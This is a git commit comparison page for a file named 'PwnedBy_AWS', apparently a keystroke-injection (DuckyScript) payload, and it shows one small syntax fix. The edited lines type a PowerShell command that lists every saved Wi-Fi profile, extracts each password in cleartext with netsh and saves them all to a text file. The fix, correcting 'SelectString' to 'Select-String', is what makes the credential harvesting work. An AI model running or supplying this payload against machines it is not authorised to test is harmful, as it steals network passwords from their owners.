Compare commits

...

2 Commits

Author SHA1 Message Date
crackingsh3llz 21a66b9e4d
Merge ca80a741fb into 483c8e239f 2024-10-30 19:11:12 -07:00
crackingsh3llz ca80a741fb
Update PwnedBy_AWS
Syntax correction
2024-10-30 09:30:10 -04:00
1 changed files with 1 additions and 1 deletions

View File

@ -127,7 +127,7 @@ ENTER
REM Retrieve passwords for each Wi-Fi profile and save to a text file
STRING netsh wlan show profiles | Select-String 'All User Profile' | ForEach-Object { $profileName =
$_.ToString().Split(':')[1].Trim(); netsh wlan show profile name="$profileName" key=clear | SelectString 'Key Content' } > C:\temp\wifi_passwords.txt
$_.ToString().Split(':')[1].Trim(); netsh wlan show profile name="$profileName" key=clear | Select-String 'Key Content' } > C:\temp\wifi_passwords.txt
ENTER
DELAY 1000